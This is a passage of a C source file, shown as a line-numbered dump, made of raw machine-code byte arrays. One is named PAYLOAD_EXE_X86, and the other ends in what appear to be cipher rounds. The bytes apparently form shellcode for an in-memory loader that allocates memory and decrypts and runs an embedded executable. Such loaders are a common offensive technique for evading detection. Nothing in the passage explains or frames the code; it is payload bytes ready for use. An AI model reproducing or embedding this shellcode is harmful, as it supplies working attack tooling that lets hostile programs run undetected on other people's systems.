1261 | 0x8b, 0x45, 0xec, 0x89, 0x45, 0xf8, 0x8b, 0x45, 0xe4, 0xc1, 0xc8, 0x08, | |
1262 | 0x89, 0xc2, 0x8b, 0x45, 0xe0, 0x01, 0xd0, 0x33, 0x45, 0xfc, 0x89, 0x45, | |
1263 | 0xec, 0x8b, 0x45, 0xe0, 0xc1, 0xc0, 0x03, 0x89, 0xc2, 0x8b, 0x45, 0xec, | |
1264 | 0x31, 0xd0, 0x89, 0x45, 0xe0, 0x8b, 0x45, 0xe8, 0x89, 0x45, 0xe4, 0x8b, | |
1265 | 0x45, 0xf8, 0x89, 0x45, 0xe8, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc, | |
1266 | 0x1a, 0x76, 0x9c, 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x83, 0xc4, 0x30, 0x5d, | |
1267 | 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x50, 0x48, 0x89, 0x4d, | |
1268 | 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, | |
1269 | 0xe0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x89, 0x45, 0xf8, 0xc7, 0x45, 0xf0, | |
1270 | 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0xc7, | |
1271 | 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xc9, 0x00, 0x00, 0x00, 0x8b, | |
1272 | 0x55, 0xf4, 0x48, 0x8b, 0x45, 0xe0, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, | |
1273 | 0x84, 0xc0, 0x74, 0x06, 0x83, 0x7d, 0xf4, 0x40, 0x75, 0x73, 0xb8, 0x10, | |
1274 | 0x00, 0x00, 0x00, 0x2b, 0x45, 0xf0, 0x89, 0xc1, 0x48, 0x8d, 0x55, 0xd0, | |
1275 | 0x8b, 0x45, 0xf0, 0x48, 0x01, 0xd0, 0x49, 0x89, 0xc8, 0xba, 0x00, 0x00, | |
1276 | 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0xbe, 0xfd, 0xff, 0xff, 0x8b, 0x45, | |
1277 | 0xf0, 0xc6, 0x44, 0x05, 0xd0, 0x80, 0x83, 0x7d, 0xf0, 0x0b, 0x76, 0x2b, | |
1278 | 0x48, 0x8b, 0x55, 0xf8, 0x48, 0x8d, 0x45, 0xd0, 0x48, 0x89, 0xc1, 0xe8, | |
1279 | 0xb0, 0xfe, 0xff, 0xff, 0x48, 0x31, 0x45, 0xf8, 0x48, 0x8d, 0x45, 0xd0, | |
1280 | 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, | |
1281 | 0x89, 0xc1, 0xe8, 0x85, 0xfd, 0xff, 0xff, 0x8b, 0x45, 0xf4, 0xc1, 0xe0, | |
1282 | 0x03, 0x89, 0x45, 0xdc, 0xc7, 0x45, 0xf0, 0x10, 0x00, 0x00, 0x00, 0x83, | |
1283 | 0x45, 0xec, 0x01, 0xeb, 0x1e, 0x8b, 0x55, 0xf4, 0x48, 0x8b, 0x45, 0xe0, | |
1284 | 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x89, 0xc2, 0x8b, 0x45, 0xf0, 0x88, | |
1285 | 0x54, 0x05, 0xd0, 0x83, 0x45, 0xf0, 0x01, 0x83, 0x45, 0xf4, 0x01, 0x83, | |
1286 | 0x7d, 0xf0, 0x10, 0x75, 0x1b, 0x48, 0x8b, 0x55, 0xf8, 0x48, 0x8d, 0x45, | |
1287 | 0xd0, 0x48, 0x89, 0xc1, 0xe8, 0x4b, 0xfe, 0xff, 0xff, 0x48, 0x31, 0x45, | |
1288 | 0xf8, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00, 0x83, 0x7d, 0xec, 0x00, | |
1289 | 0x0f, 0x84, 0x2d, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x83, | |
1290 | 0xc4, 0x50, 0x5d, 0xc3, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, | |
1291 | 0x90, 0x90, 0x90, 0x90, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, | |
1292 | 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x18, | |
1293 | 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xe8, | |
1294 | 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x42, 0x8b, 0x45, 0xfc, | |
1295 | 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf0, | |
1296 | 0x48, 0x01, 0xd0, 0x8b, 0x55, 0xfc, 0x48, 0x8d, 0x0c, 0x95, 0x00, 0x00, | |
1297 | 0x00, 0x00, 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x01, 0xca, 0x8b, 0x0a, 0x8b, | |
1298 | 0x55, 0xfc, 0x4c, 0x8d, 0x04, 0x95, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, | |
1299 | 0x55, 0xe8, 0x4c, 0x01, 0xc2, 0x8b, 0x12, 0x31, 0xca, 0x89, 0x10, 0x83, | |
1300 | 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc, 0x03, 0x76, 0xb8, 0xc7, 0x45, 0xfc, | |
1301 | 0x00, 0x00, 0x00, 0x00, 0xe9, 0x1c, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, | |
1302 | 0xf0, 0x8b, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x04, 0x8b, | |
1303 | 0x00, 0x01, 0xc2, 0x48, 0x8b, 0x45, 0xf0, 0x89, 0x10, 0x48, 0x8b, 0x45, | |
1304 | 0xf0, 0x48, 0x8d, 0x50, 0x04, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, | |
1305 | 0x04, 0x8b, 0x00, 0xc1, 0xc0, 0x05, 0x89, 0xc1, 0x48, 0x8b, 0x45, 0xf0, | |
1306 | 0x8b, 0x00, 0x31, 0xc8, 0x89, 0x02, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, | |
1307 | 0xc0, 0x08, 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x08, 0x8b, 0x0a, | |
1308 | 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x0c, 0x8b, 0x12, 0x01, 0xca, | |
1309 | 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x0c, 0x48, 0x8b, | |
1310 | 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x0c, 0x8b, 0x12, 0x89, 0xd1, 0xc1, 0xc1, | |
1311 | 0x08, 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x08, 0x8b, 0x12, 0x31, | |
1312 | 0xca, 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x08, 0x48, | |
1313 | 0x8b, 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x08, 0x8b, 0x0a, 0x48, 0x8b, 0x55, | |
1314 | 0xf0, 0x48, 0x83, 0xc2, 0x04, 0x8b, 0x12, 0x01, 0xca, 0x89, 0x10, 0x48, | |
1315 | 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0xc1, 0xc0, 0x10, 0x89, 0xc2, 0x48, 0x8b, | |
1316 | 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x0c, 0x8b, 0x00, 0x01, 0xc2, 0x48, 0x8b, | |
1317 | 0x45, 0xf0, 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x8d, 0x50, 0x0c, | |
1318 | 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x0c, 0x8b, 0x00, 0xc1, 0xc0, | |
1319 | 0x0d, 0x89, 0xc1, 0x48, 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0x31, 0xc8, 0x89, | |
1320 | 0x02, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x04, 0x48, 0x8b, 0x55, | |
1321 | 0xf0, 0x48, 0x83, 0xc2, 0x04, 0x8b, 0x12, 0x89, 0xd1, 0xc1, 0xc1, 0x07, | |
1322 | 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x08, 0x8b, 0x12, 0x31, 0xca, | |
1323 | 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x08, 0x48, 0x8b, | |
1324 | 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x08, 0x8b, 0x12, 0xc1, 0xc2, 0x10, 0x89, | |
1325 | 0x10, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc, 0x0f, 0x0f, 0x86, 0xda, | |
1326 | 0xfe, 0xff, 0xff, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x42, | |
1327 | 0x8b, 0x45, 0xfc, 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, | |
1328 | 0x8b, 0x45, 0xf0, 0x48, 0x01, 0xd0, 0x8b, 0x55, 0xfc, 0x48, 0x8d, 0x0c, | |
1329 | 0x95, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x01, 0xca, | |
1330 | 0x8b, 0x0a, 0x8b, 0x55, 0xfc, 0x4c, 0x8d, 0x04, 0x95, 0x00, 0x00, 0x00, | |
1331 | 0x00, 0x48, 0x8b, 0x55, 0xe8, 0x4c, 0x01, 0xc2, 0x8b, 0x12, 0x31, 0xca, | |
1332 | 0x89, 0x10, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc, 0x03, 0x76, 0xb8, | |
1333 | 0x90, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, | |
1334 | 0x83, 0xec, 0x50, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, | |
1335 | 0x89, 0x45, 0x20, 0x4c, 0x89, 0x4d, 0x28, 0x48, 0x8b, 0x45, 0x20, 0x48, | |
1336 | 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x89, 0x45, 0xe8, 0xe9, | |
1337 | 0xd4, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0xeb, | |
1338 | 0x1d, 0x8b, 0x45, 0xf4, 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x45, 0xe8, 0x48, | |
1339 | 0x01, 0xd0, 0x0f, 0xb6, 0x10, 0x8b, 0x45, 0xf4, 0x48, 0x98, 0x88, 0x54, | |
1340 | 0x05, 0xd0, 0x83, 0x45, 0xf4, 0x01, 0x83, 0x7d, 0xf4, 0x0f, 0x7e, 0xdd, | |
1341 | 0x48, 0x8d, 0x45, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x4d, 0x10, 0xe8, | |
1342 | 0x9c, 0xfd, 0xff, 0xff, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48, 0x83, 0x7d, | |
1343 | 0x28, 0x10, 0x48, 0x0f, 0x46, 0x45, 0x28, 0x89, 0x45, 0xe4, 0xc7, 0x45, | |
1344 | 0xf4, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x2f, 0x8b, 0x45, 0xf4, 0x48, 0x63, | |
1345 | 0xd0, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x01, 0xc2, 0x8b, 0x45, 0xf4, 0x48, | |
1346 | 0x63, 0xc8, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x01, 0xc8, 0x0f, 0xb6, 0x08, | |
1347 | 0x8b, 0x45, 0xf4, 0x48, 0x98, 0x0f, 0xb6, 0x44, 0x05, 0xd0, 0x31, 0xc8, | |
1348 | 0x88, 0x02, 0x83, 0x45, 0xf4, 0x01, 0x8b, 0x45, 0xf4, 0x3b, 0x45, 0xe4, | |
1349 | 0x7c, 0xc9, 0x8b, 0x45, 0xe4, 0x48, 0x98, 0x48, 0x29, 0x45, 0x28, 0x8b, | |
1350 | 0x45, 0xe4, 0x48, 0x98, 0x48, 0x01, 0x45, 0xf8, 0xc7, 0x45, 0xf4, 0x10, | |
1351 | 0x00, 0x00, 0x00, 0xeb, 0x25, 0x8b, 0x45, 0xf4, 0x48, 0x98, 0x48, 0x8d, | |
1352 | 0x50, 0xff, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x10, | |
1353 | 0x83, 0xc2, 0x01, 0x88, 0x10, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x02, | |
1354 | 0xeb, 0x0a, 0x83, 0x6d, 0xf4, 0x01, 0x83, 0x7d, 0xf4, 0x00, 0x7f, 0xd5, | |
1355 | 0x48, 0x83, 0x7d, 0x28, 0x00, 0x0f, 0x85, 0x21, 0xff, 0xff, 0xff, 0x90, | |
1356 | 0x48, 0x83, 0xc4, 0x50, 0x5d, 0xc3, 0x90, 0x90, 0xff, 0xff, 0xff, 0xff, | |
1357 | 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
1358 | 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, | |
1359 | 0x00, 0x00, 0x00, 0x00}; | |
1360 |
0 | ||
1 | unsigned char PAYLOAD_EXE_X86[] = { | |
2 | 0x83, 0xec, 0x20, 0x53, 0x55, 0x56, 0x57, 0x8b, 0x7c, 0x24, 0x34, 0xff, | |
3 | 0x77, 0x2c, 0xff, 0x77, 0x28, 0xff, 0x77, 0x4c, 0xff, 0x77, 0x48, 0x57, | |
4 | 0xe8, 0xd1, 0x1a, 0x00, 0x00, 0xff, 0x77, 0x2c, 0x8b, 0xf0, 0xff, 0x77, | |
5 | 0x28, 0xff, 0x77, 0x54, 0xff, 0x77, 0x50, 0x57, 0xe8, 0xbd, 0x1a, 0x00, | |
6 | 0x00, 0x83, 0xc4, 0x28, 0x8b, 0xd8, 0x89, 0x5c, 0x24, 0x34, 0x85, 0xf6, | |
7 | 0x0f, 0x84, 0x15, 0x02, 0x00, 0x00, 0x85, 0xdb, 0x0f, 0x84, 0x0d, 0x02, | |
8 | 0x00, 0x00, 0x6a, 0x04, 0x68, 0x00, 0x30, 0x00, 0x00, 0xff, 0x37, 0x6a, | |
9 | 0x00, 0xff, 0xd6, 0x8b, 0xf0, 0x85, 0xf6, 0x0f, 0x84, 0xf6, 0x01, 0x00, | |
10 | 0x00, 0xff, 0x37, 0x57, 0x56, 0xe8, 0x17, 0x1d, 0x00, 0x00, 0x6a, 0x20, | |
11 | 0x8d, 0x44, 0x24, 0x20, 0x6a, 0x00, 0x50, 0xe8, 0x2d, 0x1d, 0x00, 0x00, | |
12 | 0x8b, 0x06, 0x8d, 0xae, 0x30, 0x02, 0x00, 0x00, 0x2d, 0x30, 0x02, 0x00, | |
13 | 0x00, 0x50, 0x55, 0x8d, 0x46, 0x14, 0x50, 0x8d, 0x46, 0x04, 0x50, 0xe8, | |
14 | 0xec, 0x1b, 0x00, 0x00, 0xff, 0x76, 0x2c, 0x8d, 0x86, 0x18, 0x06, 0x00, | |
15 | 0x00, 0xff, 0x76, 0x28, 0x50, 0xe8, 0xb5, 0x1a, 0x00, 0x00, 0x83, 0xc4, | |
16 | 0x34, 0x3b, 0x86, 0x18, 0x07, 0x00, 0x00, 0x0f, 0x85, 0x4f, 0x01, 0x00, | |
17 | 0x00, 0x3b, 0x96, 0x1c, 0x07, 0x00, 0x00, 0x0f, 0x85, 0x43, 0x01, 0x00, | |
18 | 0x00, 0xff, 0x76, 0x2c, 0xff, 0x76, 0x28, 0xff, 0x76, 0x34, 0xff, 0x76, | |
19 | 0x30, 0x56, 0xe8, 0x1b, 0x1a, 0x00, 0x00, 0x83, 0xc4, 0x14, 0x89, 0x46, | |
20 | 0x30, 0x85, 0xc0, 0x0f, 0x84, 0x76, 0x01, 0x00, 0x00, 0x33, 0xff, 0x39, | |
21 | 0xbe, 0x34, 0x02, 0x00, 0x00, 0x76, 0x16, 0x8d, 0x9e, 0x38, 0x02, 0x00, | |
22 | 0x00, 0x53, 0xff, 0x56, 0x30, 0x47, 0x83, 0xc3, 0x20, 0x3b, 0xbe, 0x34, | |
23 | 0x02, 0x00, 0x00, 0x72, 0xf0, 0x33, 0xdb, 0x43, 0x39, 0x5d, 0x00, 0x76, | |
24 | 0x34, 0x8d, 0x6e, 0x34, 0x8d, 0x7e, 0x38, 0xff, 0x76, 0x2c, 0xff, 0x76, | |
25 | 0x28, 0xff, 0x77, 0x04, 0xff, 0x37, 0x56, 0xe8, 0xce, 0x19, 0x00, 0x00, | |
26 | 0x83, 0xc4, 0x14, 0x89, 0x45, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0xd2, 0x00, | |
27 | 0x00, 0x00, 0x43, 0x83, 0xc7, 0x08, 0x83, 0xc5, 0x04, 0x3b, 0x9e, 0x30, | |
28 | 0x02, 0x00, 0x00, 0x72, 0xd2, 0x8b, 0x86, 0x0c, 0x05, 0x00, 0x00, 0x6a, | |
29 | 0x02, 0x5b, 0x3b, 0xc3, 0x75, 0x15, 0x56, 0xe8, 0x29, 0x05, 0x00, 0x00, | |
30 | 0x59, 0x85, 0xc0, 0x0f, 0x84, 0xa7, 0x00, 0x00, 0x00, 0x8b, 0x86, 0x0c, | |
31 | 0x05, 0x00, 0x00, 0x8d, 0xbe, 0x48, 0x07, 0x00, 0x00, 0x83, 0xf8, 0x01, | |
32 | 0x74, 0x02, 0x8b, 0x3f, 0x83, 0xbe, 0x40, 0x03, 0x00, 0x00, 0x01, 0x74, | |
33 | 0x26, 0x56, 0xe8, 0x32, 0x03, 0x00, 0x00, 0x59, 0x85, 0xc0, 0x75, 0x08, | |
34 | 0x39, 0x9e, 0x40, 0x03, 0x00, 0x00, 0x74, 0x78, 0x56, 0xe8, 0x05, 0x04, | |
35 | 0x00, 0x00, 0x59, 0x85, 0xc0, 0x75, 0x08, 0x39, 0x9e, 0x40, 0x03, 0x00, | |
36 | 0x00, 0x74, 0x65, 0x83, 0x3f, 0x03, 0x74, 0x59, 0x83, 0x3f, 0x04, 0x74, | |
37 | 0x54, 0x83, 0x3f, 0x01, 0x74, 0x23, 0x39, 0x1f, 0x74, 0x1f, 0x83, 0x3f, | |
38 | 0x05, 0x74, 0x12, 0x83, 0x3f, 0x06, 0x74, 0x0d, 0x83, 0x3f, 0x07, 0x75, | |
39 | 0x43, 0x56, 0xe8, 0xe5, 0x17, 0x00, 0x00, 0xeb, 0x3a, 0x56, 0xe8, 0x4c, | |
40 | 0x16, 0x00, 0x00, 0xeb, 0x32, 0x8d, 0x44, 0x24, 0x10, 0x50, 0x56, 0xe8, | |
41 | 0xe7, 0x0c, 0x00, 0x00, 0x59, 0x59, 0x85, 0xc0, 0x74, 0x0d, 0x8d, 0x44, | |
42 | 0x24, 0x10, 0x50, 0x56, 0xe8, 0xe1, 0x0e, 0x00, 0x00, 0x59, 0x59, 0x8d, | |
43 | 0x44, 0x24, 0x10, 0x50, 0x56, 0xe8, 0x5d, 0x08, 0x00, 0x00, 0x59, 0xeb, | |
44 | 0x06, 0x56, 0xe8, 0x91, 0x11, 0x00, 0x00, 0x59, 0x8b, 0x5c, 0x24, 0x34, | |
45 | 0x83, 0xbe, 0x0c, 0x05, 0x00, 0x00, 0x02, 0xbf, 0x00, 0xc0, 0x00, 0x00, | |
46 | 0x75, 0x2e, 0x8b, 0x86, 0x48, 0x07, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x24, | |
47 | 0xff, 0xb6, 0x40, 0x07, 0x00, 0x00, 0x6a, 0x00, 0x50, 0xe8, 0x7b, 0x1b, | |
48 | 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x57, 0x6a, 0x00, 0xff, 0xb6, 0x48, 0x07, | |
49 | 0x00, 0x00, 0xff, 0x56, 0x40, 0x83, 0xa6, 0x48, 0x07, 0x00, 0x00, 0x00, | |
50 | 0xff, 0x36, 0x6a, 0x00, 0x56, 0xe8, 0x5b, 0x1b, 0x00, 0x00, 0x83, 0xc4, | |
51 | 0x0c, 0x57, 0x6a, 0x00, 0x56, 0xff, 0xd3, 0x33, 0xc0, 0xeb, 0x03, 0x83, | |
52 | 0xc8, 0xff, 0x5f, 0x5e, 0x5d, 0x5b, 0x83, 0xc4, 0x20, 0xc3, 0x8b, 0x44, | |
53 | 0x24, 0x04, 0x83, 0xc0, 0x04, 0xf0, 0xff, 0x00, 0x8b, 0x00, 0xc2, 0x04, | |
54 | 0x00, 0x33, 0xc0, 0xc2, 0x08, 0x00, 0x55, 0x8b, 0xec, 0xf6, 0x45, 0x10, | |
55 | 0x02, 0x56, 0x8b, 0x75, 0x08, 0x57, 0x74, 0x15, 0x8b, 0x7d, 0x18, 0x85, | |
56 | 0xff, 0x74, 0x1b, 0x8b, 0x46, 0x14, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x04, | |
57 | 0x8b, 0x46, 0x14, 0x89, 0x07, 0xf6, 0x45, 0x10, 0x01, 0x74, 0x19, 0x8b, | |
58 | 0x7d, 0x14, 0x85, 0xff, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, | |
59 | 0x0d, 0x83, 0xc6, 0x0c, 0x56, 0x8b, 0x06, 0xff, 0x50, 0x04, 0x89, 0x37, | |
60 | 0x33, 0xc0, 0x5f, 0x5e, 0x5d, 0xc2, 0x14, 0x00, 0x8b, 0x44, 0x24, 0x04, | |
61 | 0x8b, 0x40, 0x28, 0xff, 0x50, 0x54, 0x8b, 0x4c, 0x24, 0x08, 0x89, 0x01, | |
62 | 0x33, 0xc0, 0xc2, 0x08, 0x00, 0x56, 0x57, 0xe8, 0x08, 0x18, 0x00, 0x00, | |
63 | 0x8b, 0x74, 0x24, 0x10, 0xb9, 0x13, 0x14, 0x40, 0x00, 0xbf, 0xe4, 0x2a, | |
64 | 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x08, 0xe8, 0xed, | |
65 | 0x17, 0x00, 0x00, 0xb9, 0x62, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, | |
66 | 0x8b, 0x06, 0x89, 0x48, 0x04, 0xe8, 0xda, 0x17, 0x00, 0x00, 0xb9, 0x72, | |
67 | 0x14, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x08, | |
68 | 0xe8, 0xc7, 0x17, 0x00, 0x00, 0xb9, 0xc0, 0x12, 0x40, 0x00, 0x2b, 0xcf, | |
69 | 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x0c, 0xe8, 0xb4, 0x17, 0x00, 0x00, | |
70 | 0xb9, 0x76, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, | |
71 | 0x48, 0x10, 0xe8, 0xa1, 0x17, 0x00, 0x00, 0xb9, 0x71, 0x12, 0x40, 0x00, | |
72 | 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x14, 0xe8, 0x8e, 0x17, | |
73 | 0x00, 0x00, 0xb9, 0x0e, 0x14, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, | |
74 | 0x06, 0x89, 0x48, 0x18, 0xe8, 0x7b, 0x17, 0x00, 0x00, 0xb9, 0x71, 0x12, | |
75 | 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x1c, 0xe8, | |
76 | 0x68, 0x17, 0x00, 0x00, 0xb9, 0xc3, 0x13, 0x40, 0x00, 0x2b, 0xcf, 0x03, | |
77 | 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x20, 0xe8, 0x55, 0x17, 0x00, 0x00, 0xb9, | |
78 | 0xbe, 0x13, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, | |
79 | 0x24, 0xe8, 0x42, 0x17, 0x00, 0x00, 0xb9, 0xbe, 0x13, 0x40, 0x00, 0x2b, | |
80 | 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x5f, 0x89, 0x48, 0x28, 0x8b, 0x44, 0x24, | |
81 | 0x08, 0x83, 0x66, 0x04, 0x00, 0x89, 0x46, 0x28, 0x5e, 0xc3, 0x33, 0xc0, | |
82 | 0xc2, 0x04, 0x00, 0x55, 0x8b, 0xec, 0x83, 0xec, 0x2c, 0x33, 0xc0, 0x56, | |
83 | 0x6a, 0x20, 0x50, 0x89, 0x45, 0xf4, 0x89, 0x45, 0xf8, 0x89, 0x45, 0xfc, | |
84 | 0x8d, 0x45, 0xd4, 0x50, 0xe8, 0xc4, 0x19, 0x00, 0x00, 0x8b, 0x75, 0x0c, | |
85 | 0x8d, 0x4d, 0xd4, 0x83, 0xc4, 0x0c, 0x8b, 0x06, 0x51, 0x56, 0xff, 0x50, | |
86 | 0x0c, 0x85, 0xc0, 0x75, 0x12, 0x8b, 0x06, 0x8d, 0x4d, 0xfc, 0x51, 0x8d, | |
87 | 0x4d, 0xf8, 0x51, 0x8d, 0x4d, 0xf4, 0x51, 0x56, 0xff, 0x50, 0x10, 0x33, | |
88 | 0xc0, 0x5e, 0xc9, 0xc2, 0x08, 0x00, 0x33, 0xc0, 0xc2, 0x0c, 0x00, 0x8b, | |
89 | 0x4c, 0x24, 0x0c, 0x85, 0xc9, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, | |
90 | 0xeb, 0x4d, 0x53, 0x8b, 0x5c, 0x24, 0x0c, 0x33, 0xd2, 0x56, 0x8b, 0x74, | |
91 | 0x24, 0x0c, 0x57, 0x8b, 0x7e, 0x28, 0x8b, 0x84, 0x97, 0xfc, 0x03, 0x00, | |
92 | 0x00, 0x3b, 0x04, 0x93, 0x75, 0x08, 0x42, 0x83, 0xfa, 0x04, 0x75, 0xee, | |
93 | 0xeb, 0x14, 0x33, 0xd2, 0x8b, 0x84, 0x97, 0xac, 0x04, 0x00, 0x00, 0x3b, | |
94 | 0x04, 0x93, 0x75, 0x10, 0x42, 0x83, 0xfa, 0x04, 0x75, 0xee, 0x89, 0x31, | |
95 | 0xf0, 0xff, 0x46, 0x04, 0x33, 0xc0, 0xeb, 0x08, 0x83, 0x21, 0x00, 0xb8, | |
96 | 0x02, 0x40, 0x00, 0x80, 0x5f, 0x5e, 0x5b, 0xc2, 0x0c, 0x00, 0x8b, 0x4c, | |
97 | 0x24, 0x04, 0x83, 0xc8, 0xff, 0xf0, 0x0f, 0xc1, 0x41, 0x04, 0x48, 0xc2, | |
98 | 0x04, 0x00, 0x8b, 0x44, 0x24, 0x18, 0x83, 0x20, 0x00, 0x33, 0xc0, 0xc2, | |
99 | 0x18, 0x00, 0x8b, 0x44, 0x24, 0x04, 0x0f, 0xaf, 0x44, 0x24, 0x08, 0xc3, | |
100 | 0x8b, 0x44, 0x24, 0x14, 0x83, 0x20, 0x00, 0x33, 0xc0, 0xc2, 0x14, 0x00, | |
101 | 0x8b, 0x44, 0x24, 0x04, 0x03, 0x44, 0x24, 0x08, 0xc3, 0x51, 0x53, 0x56, | |
102 | 0x8b, 0x74, 0x24, 0x10, 0x8d, 0x86, 0x38, 0x03, 0x00, 0x00, 0x50, 0xff, | |
103 | 0x56, 0x30, 0x8b, 0xd8, 0x85, 0xdb, 0x75, 0x06, 0x40, 0xe9, 0xc5, 0x00, | |
104 | 0x00, 0x00, 0x55, 0x57, 0x8d, 0x86, 0xac, 0x03, 0x00, 0x00, 0x50, 0x53, | |
105 | 0xff, 0x56, 0x34, 0x8b, 0xe8, 0x85, 0xed, 0x0f, 0x84, 0xaa, 0x00, 0x00, | |
106 | 0x00, 0xbf, 0x8e, 0x14, 0x40, 0x00, 0x81, 0xef, 0x82, 0x14, 0x40, 0x00, | |
107 | 0x0f, 0x88, 0x99, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x6a, | |
108 | 0x40, 0x57, 0x55, 0xff, 0x56, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0x85, 0x00, | |
109 | 0x00, 0x00, 0x57, 0xe8, 0xd8, 0x15, 0x00, 0x00, 0xb9, 0x82, 0x14, 0x40, | |
110 | 0x00, 0x81, 0xe9, 0xe4, 0x2a, 0x40, 0x00, 0x03, 0xc1, 0x50, 0x55, 0xe8, | |
111 | 0x61, 0x18, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x10, 0x50, | |
112 | 0xff, 0x74, 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48, 0x8d, 0x86, 0xbc, | |
113 | 0x03, 0x00, 0x00, 0x50, 0x53, 0xff, 0x56, 0x34, 0x8b, 0xe8, 0x85, 0xed, | |
114 | 0x74, 0x49, 0xbf, 0xa4, 0x14, 0x40, 0x00, 0xbb, 0x98, 0x14, 0x40, 0x00, | |
